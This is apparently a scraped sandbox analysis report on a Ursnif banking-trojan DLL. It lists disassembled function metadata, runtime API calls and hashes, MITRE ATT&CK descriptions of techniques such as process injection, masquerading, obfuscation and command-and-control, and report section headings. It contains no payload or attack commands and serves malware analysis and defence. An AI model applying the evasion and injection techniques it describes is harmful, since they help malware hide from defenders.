Instruction ID: ecdeab048e3f5883267fb70ae4acfb45b5dcf2cec8725723e46331b7dbbb40db
Opcode Fuzzy Hash: 6f3d9d1881701bf8a52d60968634c7a9a83557c85b61e262406e1b402bd53dd6
Instruction Fuzzy Hash: 2741E732A00606DFDB05CFE9C85099EB7B6AF90374B35892AE465971C0E770DAC9EB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E4B4A, Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E1E4B7E
__isleadbyte_l.LIBCMT ref: 6E1E4BB2
MultiByteToWideChar.KERNEL32(00000080,00000009,6E1E0AAD,?,00000000,00000000,?,?,?,?,6E1E0AAD,00000000,?), ref: 6E1E4BE3
MultiByteToWideChar.KERNEL32(00000080,00000009,6E1E0AAD,00000001,00000000,00000000,?,?,?,?,6E1E0AAD,00000000,?), ref: 6E1E4C51

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 20f281de699cc1e56099dae52ea0e44c7c781e411286bc8a2a45e5a1179018a7
Instruction ID: a729f011394e998113ac2833a882146441807e304f31993f8993ebedd5c62965
Opcode Fuzzy Hash: 20f281de699cc1e56099dae52ea0e44c7c781e411286bc8a2a45e5a1179018a7
Instruction Fuzzy Hash: 3931DF30A00646EFDB10CFE4C894AAE3BB4BF01311B2586A8F164CB590D331D9C2EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E1584, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6E1E15AA

Part of subcall function 6E1E13CF: __fltout2.LIBCMT ref: 6E1E13FB

__cftog_l.LIBCMT ref: 6E1E15D0
__cftoe_l.LIBCMT ref: 6E1E1602

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 466b781825e0290c6ebb5ca47bbab6666077f9babd7137ed273a915d63ef55cd
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: FE11697210054ABBCF124FC5CC11CEE3F66BF1A354F598814FA6958920D732C9B6BB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D6788, Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6E1D67A2

Part of subcall function 6E1D5012: __FF_MSGBANNER.LIBCMT ref: 6E1D5035
Part of subcall function 6E1D5012: __NMSG_WRITE.LIBCMT ref: 6E1D503C

std::bad_alloc::bad_alloc.LIBCMT ref: 6E1D67C5

Part of subcall function 6E1D676D: std::exception::exception.LIBCMT ref: 6E1D6779

std::bad_exception::bad_exception.LIBCMTD ref: 6E1D67D9
__CxxThrowException@8.LIBCMT ref: 6E1D67E7

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: Exception@8Throw_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1802512180-0
Opcode ID: f52788884c56545f419f4f68759d572c4302e8625c0c434577ccb9860d0caa24
Instruction ID: 2e31939c2eff613c59e4ab0f7ba1b1fc1dcadfc203dec4cc9e2f3ff593e6b879
Opcode Fuzzy Hash: f52788884c56545f419f4f68759d572c4302e8625c0c434577ccb9860d0caa24
Instruction Fuzzy Hash: 66F0823142450D6BDB44EBE5DD14DCD36AD9B09238F204819D812AA080DF25A9DDF591

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D53B1, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6E1D53BD

Part of subcall function 6E1DAEC6: __getptd_noexit.LIBCMT ref: 6E1DAEC9
Part of subcall function 6E1DAEC6: __amsg_exit.LIBCMT ref: 6E1DAED6

__getptd.LIBCMT ref: 6E1D53D4
__amsg_exit.LIBCMT ref: 6E1D53E2
__lock.LIBCMT ref: 6E1D53F2

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 2ccc3ec4292b646d115d29317f397857f4835b6f93450465903ee9f0d7e422ad
Instruction ID: 3ca96fe2bcc0742920d2489d79225be4d665731175bf95217e4f9f1d0d4014be
Opcode Fuzzy Hash: 2ccc3ec4292b646d115d29317f397857f4835b6f93450465903ee9f0d7e422ad
Instruction Fuzzy Hash: 83F03032950B04EBD761EBF8840478E72A9EF0172AF604E1AD4519B2D0DBF499C8FB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D83B6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6E1D83C5

Part of subcall function 6E1DAEC6: __getptd_noexit.LIBCMT ref: 6E1DAEC9
Part of subcall function 6E1DAEC6: __amsg_exit.LIBCMT ref: 6E1DAED6

__getptd.LIBCMT ref: 6E1D83D3

Strings

csm, xrefs: 6E1D83E1

Memory Dump Source

Source File: 00000006.00000002.440450624.000000006E1B0000.00000020.00020000.sdmp, Offset: 6E1B0000, based on PE: false

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: b379784f21376378956890797898c50fa94f265a2b5d3dfdd8b7aa5412bfc9b9
Instruction ID: aa507e5cda70014c3e7474cb227d449d61db69846202610f7c8ca017137f1eda
Opcode Fuzzy Hash: b379784f21376378956890797898c50fa94f265a2b5d3dfdd8b7aa5412bfc9b9
Instruction Fuzzy Hash: B4016935804605CFCB66DFE0D490B9DB3B9BF24311F21A82ED45196690DF3195CEEB41

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report c36.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 6E1A1ADA, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 02EA9135, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Function 02EA5A27, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 6E1A1996, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 6E1A1BAC, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 6E1A1A44, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 02EA4AB6, Relevance: 33.2, APIs: 22, Instructions: 244
memorystringCOMMON

Function 02EAAC55, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Function 02EA51B0, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Function 6E1A1456, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Function 02EA232F, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 02EA1A08, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 6E1A1146, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 6E1A1D4B, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 02EA12E5, Relevance: 9.1, APIs: 6, Instructions: 60
sleepmemorytimeCOMMON

Function 6E1A155C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 02EA5BA2, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Function 02EA62DA, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Function 6E1A1717, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Function 02EA6545, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON